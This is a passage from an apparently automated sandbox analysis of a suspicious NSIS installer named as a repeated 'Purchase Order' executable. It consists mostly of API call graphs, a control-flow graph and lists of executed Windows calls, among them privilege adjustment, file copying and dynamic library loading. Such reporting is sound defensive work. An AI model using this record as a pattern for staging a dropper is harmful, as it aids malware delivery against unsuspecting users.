4348->4353 4352 40335e 12 API calls 4349->4352 4504 4062ba lstrcpynW 4351->4504 4358 40362b 4352->4358 4353->4338 4359 403666 4354->4359 4358->4341 4358->4403 4366 4036c4 4359->4366 4367 40372a 4359->4367 4360 403834 4363 4038b8 ExitProcess 4360->4363 4364 40383c GetCurrentProcess OpenProcessToken 4360->4364 4361 403714 4362 405920 MessageBoxIndirectW 4361->4362 4368 403722 ExitProcess 4362->4368 4369 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4364->4369 4370 403888 4364->4370 4371 405c97 18 API calls 4366->4371 4372 40588b 5 API calls 4367->4372 4369->4370 4373 406694 5 API calls 4370->4373 4375 4036d0 4371->4375 4376 40372f lstrcatW 4372->4376 4374 40388f 4373->4374 4377 4038a4 ExitWindowsEx 4374->4377 4380 4038b1 4374->4380 4375->4403 4505 4062ba lstrcpynW 4375->4505 4378 403740 lstrcatW 4376->4378 4379 40374b lstrcatW lstrcmpiW 4376->4379 4377->4363 4377->4380 4378->4379 4382 403767 4379->4382 4379->4403 4516 40140b 4380->4516 4383 403773 4382->4383 4384 40376c 4382->4384 4388 40586e 2 API calls 4383->4388 4387 4057f1 4 API calls 4384->4387 4386 4036df 4506 4062ba lstrcpynW 4386->4506 4391 403771 4387->4391 4392 403778 SetCurrentDirectoryW 4388->4392 4448 4039aa 4390->4448 4391->4392 4393 403793 4392->4393 4394 403788 4392->4394 4515 4062ba lstrcpynW 4393->4515 4514 4062ba lstrcpynW 4394->4514 4397 4062dc 17 API calls 4398 4037d2 DeleteFileW 4397->4398 4399 4037df CopyFileW 4398->4399 4405 4037a1 4398->4405 4399->4405 4400 403828 4402 406080 36 API calls 4400->4402 4401 406080 36 API calls 4401->4405 4402->4403 4507 4038d0 4403->4507 4404 4062dc 17 API calls 4404->4405 4405->4397 4405->4400 4405->4401 4405->4404 4406 4058a3 2 API calls 4405->4406 4407 403813 CloseHandle 4405->4407 4406->4405 4407->4405 4408->4333 4409->4335 4411 40654e 5 API calls 4410->4411 4413 40336a 4411->4413 4412 403374 4412->4340 4413->4412 4414 405b8f 3 API calls 4413->4414 4415 40337c 4414->4415 4416 40586e 2 API calls 4415->4416 4417 403382 4416->4417 4519 405ddf 4417->4519 4523 405db0 GetFileAttributesW CreateFileW 4420->4523 4422 402f1d 4423 402f2d 4422->4423 4524 4062ba lstrcpynW 4422->4524 4423->4347 4425 402f43 4426 405bdb 2 API calls 4425->4426 4427 402f49 4426->4427 4525 4062ba lstrcpynW 4427->4525 4429 402f54 GetFileSize 4444 403050 4429->4444 4447 402f6b 4429->4447 4431 403059 4431->4423 4433 403089 GlobalAlloc 4431->4433 4538 403347 SetFilePointer 4431->4538 4432 403331 ReadFile 4432->4447 4537 403347 SetFilePointer 4433->4537 4434 4030bc 4438 402e79 6 API calls 4434->4438 4437 4030a4 4440 403116 31 API calls 4437->4440 4438->4423 4439 403072 4441 403331 ReadFile 4439->4441 4445 4030b0 4440->4445 4443 40307d 4441->4443 4442 402e79 6 API calls 4442->4447 4443->4423 4443->4433 4526 402e79 4444->4526 4445->4423 4445->4445 4446 4030ed SetFilePointer 4445->4446 4446->4423 4447->4423 4447->4432 4447->4434 4447->4442 4447->4444 4449 406694 5 API calls 4448->4449 4450 4039be 4449->4450 4451 4039c4 GetUserDefaultUILanguage 4450->4451 4452 4039d6 4450->4452 4539 406201 wsprintfW 4451->4539 4453 406188 3 API calls 4452->4453 4455 403a06 4453->4455 4457 403a25 lstrcatW 4455->4457 4458 406188 3 API calls 4455->4458 4456 4039d4 4540 403c80 4456->4540 4457->4456 4458->4457 4461 405c97 18 API calls 4462 403a57 4461->4462 4463 403aeb 4462->4463 4465 406188 3 API calls 4462->4465 4464 405c97 18 API calls 4463->4464 4466 403af1 4464->4466 4468 403a89 4465->4468 4467 403b01 LoadImageW 4466->4467 4469 4062dc 17 API calls 4466->4469 4470 403ba7 4467->4470 4471 403b28 RegisterClassW 4467->4471 4468->4463 4472 403aaa lstrlenW 4468->4472 4476 405bbc CharNextW 4468->4476 4469->4467 4475 40140b 2 API calls 4470->4475 4473 403bb1 4471->4473 4474 403b5e SystemParametersInfoW CreateWindowExW 4471->4474 4477 403ab8 lstrcmpiW 4472->4477 4478 403ade 4472->4478 4473->4403 4474->4470 4479 403bad 4475->4479 4480 403aa7 4476->4480 4477->4478 4481 403ac8 GetFileAttributesW 4477->4481 4482 405b8f 3 API calls 4478->4482 4479->4473 4484 403c80 18 API calls 4479->4484 4480->4472 4483 403ad4 4481->4483 4485 403ae4 4482->4485 4483->4478 4486 405bdb 2 API calls 4483->4486 4487 403bbe 4484->4487 4548 4062ba lstrcpynW 4485->4548 4486->4478 4489 403bca ShowWindow 4487->4489 4490 403c4d 4487->4490 4492 406624 3 API calls 4489->4492 4549 4053f5 OleInitialize 4490->4549 4494 403be2 4492->4494 4493 403c53 4495 403c6f 4493->4495 4501 403c57 4493->4501 4496 403bf0 GetClassInfoW 4494->4496 4498 406624 3 API calls 4494->4498 4497 40140b 2 API calls 4495->4497 4499 403c04 GetClassInfoW RegisterClassW 4496->4499 4500 403c1a DialogBoxParamW 4496->4500 4497->4473 4498->4496 4499->4500 4502 40140b 2 API calls 4500->4502 4501->4473 4503 40140b 2 API calls 4501->4503 4502->4473 4503->4473 4504->4353 4505->4386 4506->4390 4508 4038e8 4507->4508 4509 4038da CloseHandle 4507->4509 4567 403915 4508->4567 4509->4508 4512 4059cc 67 API calls 4513 403703 OleUninitialize 4512->4513 4513->4360 4513->4361 4514->4393 4515->4405 4517 401389 2 API calls 4516->4517 4518 401420 4517->4518 4518->4363 4520 405dec GetTickCount GetTempFileNameW 4519->4520 4521 405e22 4520->4521 4522 40338d 4520->4522 4521->4520 4521->4522 4522->4340 4523->4422 4524->4425 4525->4429 4527 402e82 4526->4527 4528 402e9a 4526->4528 4529 402e92 4527->4529 4530 402e8b DestroyWindow 4527->4530 4531 402ea2 4528->4531 4532 402eaa GetTickCount 4528->4532 4529->4431 4530->4529 4533 4066d0 2 API calls 4531->4533 4534 402eb8 CreateDialogParamW ShowWindow 4532->4534 4535 402edb 4532->4535 4536 402ea8 4533->4536 4534->4535 4535->4431 4536->4431 4537->4437 4538->4439 4539->4456 4541 403c94 4540->4541 4556 406201 wsprintfW 4541->4556 4543 403d05 4557 403d39 4543->4557 4545 403a35 4545->4461 4546 403d0a 4546->4545 4547 4062dc 17 API calls 4546->4547 4547->4546 4548->4463 4560 40427d 4549->4560 4551 40543f 4552 40427d SendMessageW 4551->4552 4553 405451 OleUninitialize 4552->4553 4553->4493 4554 405418 4554->4551 4563 401389 4554->4563 4556->4543 4558 4062dc 17 API calls 4557->4558 4559 403d47 SetWindowTextW 4558->4559 4559->4546 4561 404295 4560->4561 4562 404286 SendMessageW 4560->4562 4561->4554 4562->4561 4565 401390 4563->4565 4564 4013fe 4564->4554 4565->4564 4566 4013cb MulDiv SendMessageW 4565->4566 4566->4565 4568 403923 4567->4568 4569 4038ed 4568->4569 4570 403928 FreeLibrary GlobalFree 4568->4570 4569->4512 4570->4569 4570->4570 5417 701218dd 5418 70121900 5417->5418 5419 70121947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5418->5419 5420 70121935 GlobalFree 5418->5420 5421 70121272 2 API calls 5419->5421 5420->5419 5422 70121ad2 GlobalFree GlobalFree 5421->5422 5423 40190f 5424 402c41 17 API calls 5423->5424 5425 401916 5424->5425 5426 405920 MessageBoxIndirectW 5425->5426 5427 40191f 5426->5427 5428 401491 5429 405322 24 API calls 5428->5429 5430 401498 5429->5430 5431 401d14 5432 402c1f 17 API calls 5431->5432 5433 401d1b 5432->5433 5434 402c1f 17 API calls 5433->5434 5435 401d27 GetDlgItem 5434->5435 5436 402592 5435->5436 4764 405296 4765 4052a6 4764->4765 4766 4052ba 4764->4766 4767 4052ac 4765->4767 4777 405303 4765->4777 4768 4052c2 IsWindowVisible 4766->4768 4775 4052e2 4766->4775 4770 40427d SendMessageW 4767->4770 4771 4052cf 4768->4771 4768->4777 4769 405308 CallWindowProcW 4772 4052b6 4769->4772 4770->4772 4778 404bec SendMessageW 4771->4778 4775->4769 4783 404c6c 4775->4783 4777->4769 4779 404c4b SendMessageW 4778->4779 4780 404c0f GetMessagePos ScreenToClient SendMessageW 4778->4780 4781 404c43 4779->4781 4780->4781 4782 404c48 4780->4782 4781->4775 4782->4779 4792 4062ba lstrcpynW 4783->4792 4785 404c7f 4793 406201 wsprintfW 4785->4793 4787 404c89 4788 40140b 2 API calls 4787->4788 4789 404c92 4788->4789 4794 4062ba lstrcpynW 4789->4794 4791 404c99 4791->4777 4792->4785 4793->4787 4794->4791 5437 402598 5438 4025c7 5437->5438 5439 4025ac 5437->5439 5441 4025fb 5438->5441 5442 4025cc 5438->5442 5440 402c1f 17 API calls 5439->5440 5449 4025b3 5440->5449 5443 402c41 17 API calls 5441->5443 5444 402c41 17 API calls 5442->5444 5445 402602 lstrlenW 5443->5445 5446 4025d3 WideCharToMultiByte lstrlenA 5444->5446 5445->5449 5446->5449 5447 402645 5448 40262f 5448->5447 5450 405e62 WriteFile 5448->5450 5449->5447 5449->5448 5451 405e91 5 API calls 5449->5451 5450->5447 5451->5448 5452 70122c4f 5453 70122c67 5452->5453 5454 7012158f 2 API calls 5453->5454 5455 70122c82 5454->5455 4896 404c9e GetDlgItem GetDlgItem 4897 404cf0 7 API calls 4896->4897 4905 404f09 4896->4905 4898 404d93 DeleteObject 4897->4898 4899 404d86 SendMessageW 4897->4899 4900 404d9c 4898->4900 4899->4898 4901 404dd3 4900->4901 4903 404dab 4900->4903 4907 404231 18 API calls 4901->4907 4902 404fed 4908 405099 4902->4908 4914 405281 4902->4914 4919 405046 SendMessageW 4902->4919 4904 4062dc 17 API calls 4903->4904 4909 404db5 SendMessageW SendMessageW 4904->4909 4905->4902 4906 404fce 4905->4906 4912 404f69 4905->4912 4906->4902 4916 404fdf SendMessageW 4906->4916 4913 404de7 4907->4913 4910 4050a3 SendMessageW 4908->4910 4911 4050ab 4908->4911 4909->4900 4910->4911 4921 4050c4 4911->4921 4922 4050bd ImageList_Destroy 4911->4922 4929 4050d4 4911->4929 4917 404bec 5 API calls 4912->4917 4918 404231 18 API calls 4913->4918 4915 404298 8 API calls 4914->4915 4920 40528f 4915->4920 4916->4902 4933 404f7a 4917->4933 4934 404df5 4918->4934 4919->4914 4924 40505b SendMessageW 4919->4924 4925 4050cd GlobalFree 4921->4925 4921->4929 4922->4921 4923 405243 4923->4914 4930 405255 ShowWindow GetDlgItem ShowWindow 4923->4930 4927 40506e 4924->4927 4925->4929 4926 404eca GetWindowLongW SetWindowLongW 4928 404ee3 4926->4928 4939 40507f SendMessageW 4927->4939 4931 404f01 4928->4931 4932 404ee9 ShowWindow 4928->4932 4929->4923 4942 404c6c 4 API calls 4929->4942 4945 40510f 4929->4945 4930->4914 4953 404266 SendMessageW 4931->4953 4952 404266 SendMessageW 4932->4952 4933->4906 4934->4926 4935 404ec4 4934->4935 4938 404e45 SendMessageW 4934->4938 4940 404e81 SendMessageW 4934->4940 4941 404e92 SendMessageW 4934->4941 4935->4926 4935->4928 4938->4934 4939->4908 4940->4934 4941->4934 4942->4945 4943 404efc 4943->4914 4944 405219 InvalidateRect 4944->4923 4946 40522f 4944->4946 4947 40513d SendMessageW 4945->4947 4949 405153 4945->4949 4954 404ba7 4946->4954 4947->4949 4948 4051b4 4951 4051c7 SendMessageW SendMessageW 4948->4951 4949->4944 4949->4948 4949->4951 4951->4949 4952->4943 4953->4905 4957 404ade 4954->4957 4956 404bbc 4956->4923 4958 404af7 4957->4958 4959 4062dc 17 API calls 4958->4959 4960 404b5b 4959->4960 4961 4062dc 17 API calls 4960->4961 4962 404b66 4961->4962 4963 4062dc 17 API calls 4962->4963 4964 404b7c lstrlenW wsprintfW SetDlgItemTextW 4963->4964 4964->4956 5456 40149e 5457 4014ac PostQuitMessage 5456->5457 5458 4022f7 5456->5458 5457->5458 5459 401c1f 5460 402c1f 17 API calls 5459->5460 5461 401c26 5460->5461 5462 402c1f 17 API calls 5461->5462 5463 401c33 5462->5463 5464 401c48 5463->5464 5465 402c41 17 API calls 5463->5465 5466 401c58 5464->5466 5467 402c41 17 API calls 5464->5467 5465->5464 5468 401c63 5466->5468 5469 401caf 5466->5469 5467->5466 5471 402c1f 17 API calls 5468->5471 5470 402c41 17 API calls 5469->5470 5472 401cb4 5470->5472 5473 401c68 5471->5473 5475 402c41 17 API calls 5472->5475 5474 402c1f 17 API calls 5473->5474 5476 401c74 5474->5476 5477 401cbd FindWindowExW 5475->5477 5478 401c81 SendMessageTimeoutW 5476->5478 5479 401c9f SendMessageW 5476->5479 5480 401cdf 5477->5480 5478->5480 5479->5480 5481 402aa0 SendMessageW 5482 402ac5 5481->5482 5483 402aba InvalidateRect 5481->5483 5483->5482 5484 402821 5485 402827 5484->5485 5486 402ac5 5485->5486 5487 40282f FindClose 5485->5487 5487->5486 5488 4043a1 lstrlenW 5489 4043c0 5488->5489 5490 4043c2 WideCharToMultiByte 5488->5490 5489->5490 5491 404722 5492 40474e 5491->5492 5493 40475f 5491->5493 5552 405904 GetDlgItemTextW 5492->5552 5495 40476b GetDlgItem 5493->5495 5501 4047ca 5493->5501 5497 40477f 5495->5497 5496 404759 5499 40654e 5 API calls 5496->5499 5500 404793 SetWindowTextW 5497->5500 5507 405c3a 4 API calls 5497->5507 5498 4048ae 5550 404a5d 5498->5550 5554 405904 GetDlgItemTextW 5498->5554 5499->5493 5503 404231 18 API calls 5500->5503 5501->5498 5504 4062dc 17 API calls 5501->5504 5501->5550 5508 4047af 5503->5508 5509 40483e SHBrowseForFolderW 5504->5509 5505 4048de 5510 405c97 18 API calls 5505->5510 5506 404298 8 API calls 5511 404a71 5506->5511 5512 404789 5507->5512 5513 404231 18 API calls 5508->5513 5509->5498 5514 404856 CoTaskMemFree 5509->5514 5515 4048e4 5510->5515 5512->5500 5518 405b8f 3 API calls 5512->5518 5516 4047bd 5513->5516 5517 405b8f 3 API calls 5514->5517 5555 4062ba lstrcpynW 5515->5555 5553 404266 SendMessageW 5516->5553 5520 404863 5517->5520 5518->5500 5523 40489a SetDlgItemTextW 5520->5523 5527 4062dc 17 API calls 5520->5527 5522 4047c3 5525 406694 5 API calls 5522->5525 5523->5498 5524 4048fb 5526 406694 5 API calls 5524->5526 5525->5501 5538 404902 5526->5538 5528 404882 lstrcmpiW 5527->5528 5528->5523 5531 404893 lstrcatW 5528->5531 5529 404943 5556 4062ba lstrcpynW 5529->5556 5531->5523 5532 40494a 5533 405c3a 4 API calls 5532->5533 5534 404950 GetDiskFreeSpaceW 5533->5534 5537 404974 MulDiv 5534->5537 5539 40499b 5534->5539 5536 405bdb 2 API calls 5536->5538 5537->5539 5538->5529 5538->5536 5538->5539 5540 404a0c 5539->5540 5541 404ba7 20 API calls 5539->5541 5542 404a2f 5540->5542 5544 40140b 2 API calls 5540->5544 5543 4049f9 5541->5543 5557 404253 EnableWindow 5542->5557 5546 404a0e SetDlgItemTextW 5543->5546 5547 4049fe 5543->5547 5544->5542 5546->5540 5549 404ade 20 API calls 5547->5549 5548 404a4b 5548->5550 5551 40467b SendMessageW 5548->5551 5549->5540 5550->5506 5551->5550 5552->5496 5553->5522 5554->5505 5555->5524 5556->5532 5557->5548 5558 70121671 5559 70121516 GlobalFree 5558->5559 5561 70121689 5559->5561 5560 701216cf GlobalFree 5561->5560 5562 701216a4 5561->5562 5563 701216bb VirtualFree 5561->5563 5562->5560 5563->5560 5564 4015a3 5565 402c41 17 API calls 5564->5565 5566 4015aa SetFileAttributesW 5565->5566 5567 4015bc 5566->5567 5568 401a30 5569 402c41 17 API calls 5568->5569 5570 401a39 ExpandEnvironmentStringsW 5569->5570 5571 401a4d 5570->5571 5573 401a60 5570->5573 5572 401a52 lstrcmpW 5571->5572 5571->5573 5572->5573 4571 402032 4572 402044 4571->4572 4573 4020f6 4571->4573 4574 402c41 17 API calls 4572->4574 4575 401423 24 API calls 4573->4575 4576 40204b 4574->4576 4581 402250 4575->4581 4577 402c41 17 API calls 4576->4577 4578 402054 4577->4578 4579 40206a LoadLibraryExW 4578->4579 4580 40205c GetModuleHandleW 4578->4580 4579->4573 4582 40207b 4579->4582 4580->4579 4580->4582 4594 406703 WideCharToMultiByte 4582->4594 4585 4020c5 4587 405322 24 API calls 4585->4587 4586 40208c 4588 402094 4586->4588 4589 4020ab 4586->4589 4591 40209c 4587->4591 4590 401423 24 API calls 4588->4590 4597 7012177b 4589->4597 4590->4591 4591->4581 4592 4020e8 FreeLibrary 4591->4592 4592->4581 4595 40672d GetProcAddress 4594->4595 4596 402086 4594->4596 4595->4596 4596->4585 4596->4586 4598 701217ae 4597->4598 4639 70121b63 4598->4639 4600 701217b5 4601 701218da 4600->4601 4602 701217c6 4600->4602 4603 701217cd 4600->4603 4601->4591 4689 70122356 4602->4689 4673 70122398 4603->4673 4608 701217f2 4609 70121813 4608->4609 4610 70121831 4608->4610 4702 7012256d 4609->4702 4613 70121882 4610->4613 4614 70121837 4610->4614 4611 701217e3 4616 701217f4 4611->4616 4617 701217e9 4611->4617 4612 701217fc 4612->4608 4699 70122d2f 4612->4699 4621 7012256d 10 API calls 4613->4621 4719 701215c6 4614->4719 4693 70122728 4616->4693 4617->4608 4683 70122a74 4617->4683 4626 70121873 4621->4626 4622 70121819 4713 701215b4 4622->4713 4631 701218c9 4626->4631 4726 70122530 4626->4726 4627 7012181f 4716 70121272 4627->4716 4628 701217fa 4628->4608 4629 7012256d 10 API calls 4629->4626 4631->4601 4633 701218d3 GlobalFree 4631->4633 4633->4601 4636 701218b5 4636->4631 4730 7012153d wsprintfW 4636->4730 4637 701218ae FreeLibrary 4637->4636 4733 7012121b GlobalAlloc 4639->4733 4641 70121b87 4734 7012121b GlobalAlloc 4641->4734 4643 70121dad GlobalFree GlobalFree GlobalFree 4644 70121dca 4643->4644 4660 70121e14 4643->4660 4645 70122196 4644->4645 4652 70121ddf 4644->4652 4644->4660 4647 701221b8 GetModuleHandleW 4645->4647 4645->4660 4646 70121c68 GlobalAlloc 4668 70121b92 4646->4668 4649 701221c9 LoadLibraryW 4647->4649 4650 701221de 4647->4650 4648 70121cd1 GlobalFree 4648->4668 4649->4650 4649->4660 4741 70121621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4650->4741 4651 70121cb3 lstrcpyW 4654 70121cbd lstrcpyW 4651->4654 4652->4660 4737 7012122c 4652->4737 4654->4668 4655 70122230 4658 7012223d lstrlenW 4655->4658 4655->4660 4656 701220f0 4656->4660 4664 70122138 lstrcpyW 4656->4664 4742 70121621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4658->4742 4659 70122068 4740 7012121b GlobalAlloc 4659->4740 4660->4600 4661 701221f0 4661->4655 4671 7012221a GetProcAddress 4661->4671 4664->4660 4665 70122257 4665->4660 4666 70121d0f 4666->4668 4735 7012158f GlobalSize GlobalAlloc 4666->4735 4667 70121fa9 GlobalFree 4667->4668 4668->4643 4668->4646 4668->4648 4668->4651 4668->4654 4668->4656 4668->4659 4668->4660 4668->4666 4668->4667 4669 7012122c 2 API calls 4668->4669 4669->4668 4671->4655 4672 70122071 4672->4600 4680 701223b0 4673->4680 4675 701224d9 GlobalFree 4678 701217d3 4675->4678 4675->4680 4676 70122483 GlobalAlloc CLSIDFromString 4676->4675 4677 70122458 GlobalAlloc WideCharToMultiByte 4677->4675 4678->4608 4678->4611 4678->4612 4679 7012122c GlobalAlloc lstrcpynW 4679->4680 4680->4675 4680->4676 4680->4677 4680->4679 4682 701224a2 4680->4682 4744 701212ba 4680->4744 4682->4675 4748 701226bc 4682->4748 4685 70122a86 4683->4685 4684 70122b2b SetFilePointer 4686 70122b49 4684->4686 4685->4684 4687 70122c45 4686->4687 4688 70122c3a GetLastError 4686->4688 4687->4608 4688->4687 4690 7012236b 4689->4690 4691 70122376 GlobalAlloc 4690->4691 4692 701217cc 4690->4692 4691->4690 4692->4603 4697 70122758 4693->4697 4694 701227f3 GlobalAlloc 4698 70122816 4694->4698 4695 70122806 4696 7012280c GlobalSize 4695->4696 4695->4698 4696->4698 4697->4694 4697->4695 4698->4628 4700 70122d3a 4699->4700 4701 70122d7a GlobalFree 4700->4701 4751 7012121b GlobalAlloc 4702->4751 4704 70122612 StringFromGUID2 4709 70122577 4704->4709 4705 70122623 lstrcpynW 4705->4709 4706 701225f0 MultiByteToWideChar 4706->4709 4707 7012265a GlobalFree 4707->4709 4708 70122636 wsprintfW 4708->4709 4709->4704 4709->4705 4709->4706 4709->4707 4709->4708 4710 7012268f GlobalFree 4709->4710 4711 70121272 2 API calls 4709->4711 4752 701212e1 4709->4752 4710->4622 4711->4709 4756 7012121b GlobalAlloc 4713->4756 4715 701215b9 LdrInitializeThunk 4715->4627 4717 701212b5 GlobalFree 4716->4717 4718 7012127b GlobalAlloc lstrcpynW 4716->4718 4717->4626 4718->4717 4720 701215d6 lstrcpyW 4719->4720 4721 701215e4 4719->4721 4723 7012161d 4720->4723 4721->4720 4724 701215f0 4721->4724 4723->4629 4724->4723 4725 7012160d wsprintfW 4724->4725 4725->4723 4727 7012253e 4726->4727 4728 70121895 4726->4728 4727->4728 4729 7012255a GlobalFree 4727->4729 4728->4636 4728->4637 4729->4727 4731 70121272 2 API calls 4730->4731 4732 7012155e 4731->4732 4732->4631 4733->4641 4734->4668 4736 701215ad 4735->4736 4736->4666 4743 7012121b GlobalAlloc 4737->4743 4739 7012123b lstrcpynW 4739->4660 4740->4672 4741->4661 4742->4665 4743->4739 4745 701212c1 4744->4745 4746 7012122c 2 API calls 4745->4746 4747 701212df 4746->4747 4747->4680 4749 70122720 4748->4749 4750 701226ca VirtualAlloc 4748->4750 4749->4682 4750->4749 4751->4709 4753 701212ea 4752->4753 4754 7012130c 4752->4754 4753->4754 4755 701212f0 lstrcpyW 4753->4755 4754->4709 4755->4754 4756->4715 5579 701210e1 5588 70121111 5579->5588 5580 701211d8 GlobalFree 5581 701212ba 2 API calls 5581->5588 5582 701211d3 5582->5580 5583 70121164 GlobalAlloc 5583->5588 5584 701211f8 GlobalFree 5584->5588 5585 70121272 2 API calls 5587 701211c4 GlobalFree 5585->5587 5586 701212e1 lstrcpyW 5586->5588 5587->5588 5588->5580 5588->5581 5588->5582 5588->5583 5588->5584 5588->5585 5588->5586 5588->5587 4757 401735 4758 402c41 17 API calls 4757->4758 4759 40173c SearchPathW 4758->4759 4760 4029e6 4759->4760 4761 401757 4759->4761 4761->4760 4763 4062ba lstrcpynW 4761->4763 4763->4760 5589 402a35 5590 402c1f 17 API calls 5589->5590 5591 402a3b 5590->5591 5592 402a72 5591->5592 5593 40288b 5591->5593 5595 402a4d 5591->5595 5592->5593 5594 4062dc 17 API calls 5592->5594 5594->5593 5595->5593 5597 406201 wsprintfW 5595->5597 5597->5593 5598 4014b8 5599 4014be 5598->5599 5600 401389 2 API calls 5599->5600 5601 4014c6 5600->5601 5602 401db9 GetDC 5603 402c1f 17 API calls 5602->5603 5604 401dcb GetDeviceCaps MulDiv ReleaseDC 5603->5604 5605 402c1f 17 API calls 5604->5605 5606 401dfc 5605->5606 5607 4062dc 17 API calls 5606->5607 5608 401e39 CreateFontIndirectW 5607->5608 5609 402592 5608->5609 5610 40283b 5611 402843 5610->5611 5612 402847 FindNextFileW 5611->5612 5613 402859 5611->5613 5612->5613 5614 4029e6 5613->5614 5616 4062ba lstrcpynW 5613->5616 5616->5614

                                              Executed Functions

                                              Function 0040338F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 3 4033e4-4033f8 call 406624 lstrlenA 2->3 9 4033fa-403416 call 406694 * 3 3->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 31 4034b8-4034bd 28->31 32 4034bf-4034c3 28->32 36 403633-40364d DeleteFileW call 402edd 29->36 37 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->37 31->31 31->32 34 4034c5-4034c9 32->34 35 4034ca-4034ce 32->35 34->35 38 4034d4-4034da 35->38 39 40358d-40359a call 405bbc 35->39 57 403653-403659 36->57 58 4036fe-40370e call 4038d0 OleUninitialize 36->58 37->36 54 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 37->54 40 4034f5-40352e 38->40 41 4034dc-4034e4 38->41 55 40359c-40359d 39->55 56 40359e-4035a4 39->56 47 403530-403535 40->47 48 40354b-403585 40->48 45 4034e6-4034e9 41->45 46 4034eb 41->46 45->40 45->46 46->40 47->48 52 403537-40353f 47->52 48->39 53 403587-40358b 48->53 62 403541-403544 52->62 63 403546 52->63 53->39 64 4035ac-4035ba call 4062ba 53->64 54->36 54->58 55->56 56->28 66 4035aa 56->66 59 4036ee-4036f5 call 4039aa 57->59 60 40365f-40366a call 405bbc 57->60 75 403834-40383a 58->75 76 403714-403724 call 405920 ExitProcess 58->76 74 4036fa 59->74 77 4036b8-4036c2 60->77 78 40366c-4036a1 60->78 62->48 62->63 63->48 67 4035bf 64->67 66->67 67->29 74->58 80 4038b8-4038c0 75->80 81 40383c-403852 GetCurrentProcess OpenProcessToken 75->81 85 4036c4-4036d2 call 405c97 77->85 86 40372a-40373e call 40588b lstrcatW 77->86 82 4036a3-4036a7 78->82 83 4038c2 80->83 84 4038c6-4038ca ExitProcess 80->84 88 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403888-403896 call 406694 81->89 90 4036b0-4036b4 82->90 91 4036a9-4036ae 82->91 83->84 85->58 101 4036d4-4036ea call 4062ba * 2 85->101 102 403740-403746 lstrcatW 86->102 103 40374b-403765 lstrcatW lstrcmpiW 86->103 88->89 99 4038a4-4038af ExitWindowsEx 89->99 100 403898-4038a2 89->100 90->82 96 4036b6 90->96 91->90 91->96 96->77 99->80 104 4038b1-4038b3 call 40140b 99->104 100->99 100->104 101->59 102->103 103->58 106 403767-40376a 103->106 104->80 107 403773 call 40586e 106->107 108 40376c-403771 call 4057f1 106->108 117 403778-403786 SetCurrentDirectoryW 107->117 108->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->58 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 004033B2
                                              • GetVersion.KERNEL32 ref: 004033B8
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                              • #17.COMCTL32(?,00000006,?,0000000A), ref: 00403428
                                              • OleInitialize.OLE32(00000000), ref: 0040342F
                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,?,00000000), ref: 0040344B
                                              • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 00403460
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,?,00000006,?,0000000A), ref: 00403498
                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                              • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004035D2
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004035E3
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035EF
                                              • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403603
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040360B
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040361C
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403624
                                              • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 00403638
                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                              • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403703
                                              • ExitProcess.KERNEL32 ref: 00403724
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403737
